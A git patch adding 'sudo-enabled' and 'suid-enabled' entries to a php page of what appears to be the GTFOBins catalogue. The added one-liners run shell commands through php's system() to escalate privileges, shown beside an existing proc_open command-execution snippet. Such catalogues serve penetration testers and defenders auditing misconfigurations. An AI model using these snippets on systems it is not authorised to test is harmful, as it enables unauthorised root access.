From 0047d8bfb7f62058fed3d5702f38c0394bfc9b59 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Fri, 25 May 2018 14:07:26 +0200
Subject: [PATCH] Add sudo and suid to php

---
 _gtfobins/php.md | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/_gtfobins/php.md b/_gtfobins/php.md
index 7b22700..34b3ad4 100644
--- a/_gtfobins/php.md
+++ b/_gtfobins/php.md
@@ -19,6 +19,14 @@ functions:
     - code: |
         export CMD="ls /"
         php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
+  sudo-enabled:
+    - code: |
+        CMD="id"
+        sudo php -r "system('$CMD');"
+  suid-enabled:
+    - code: |
+        CMD="id"
+        ./php -r "system('$CMD');"
   upload:
     - description: Serve files in the local folder running an HTTP server.
       code: |